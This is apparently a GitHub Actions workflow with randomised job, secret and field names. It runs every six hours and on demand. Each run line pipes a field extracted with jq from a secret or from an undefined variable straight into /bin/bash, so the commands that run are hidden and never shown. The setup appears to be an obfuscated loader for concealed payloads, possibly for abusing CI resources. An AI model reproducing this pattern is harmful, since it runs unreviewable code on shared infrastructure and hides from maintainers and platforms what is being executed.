name: caoguojian6715
on:
  workflow_dispatch:
  schedule:
    - cron: '30 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caoguojian6715
        env:
          yyv40: ${{ secrets.yyv40 }}
        run: |
          echo $yyv40 | jq -r .evmsm6 | /bin/bash
          echo $axlkp623 | jq -r .lq3417 | /bin/bash
          echo $bes8 | jq -r .tyng497 | /bin/bash
          echo $bj54 | jq -r .zmtet590 | /bin/bash
          echo $oddjw5347 | jq -r .fffsh01935 | /bin/bash
          echo $e8172 | jq -r .a8884 | /bin/bash
          echo $th7 | jq -r .fxo7 | /bin/bash
          echo $a04 | jq -r .jumn3 | /bin/bash
          echo $ognon257 | jq -r .glemc682 | /bin/bash
          echo $px05 | jq -r .d2 | /bin/bash
          echo $zzol299 | jq -r .fpq9492 | /bin/bash
          echo $lsmen0036 | jq -r .gtm6243 | /bin/bash
          echo $sli6 | jq -r .dnry4965 | /bin/bash
          echo $dozcm54 | jq -r .vfzf5217 | /bin/bash

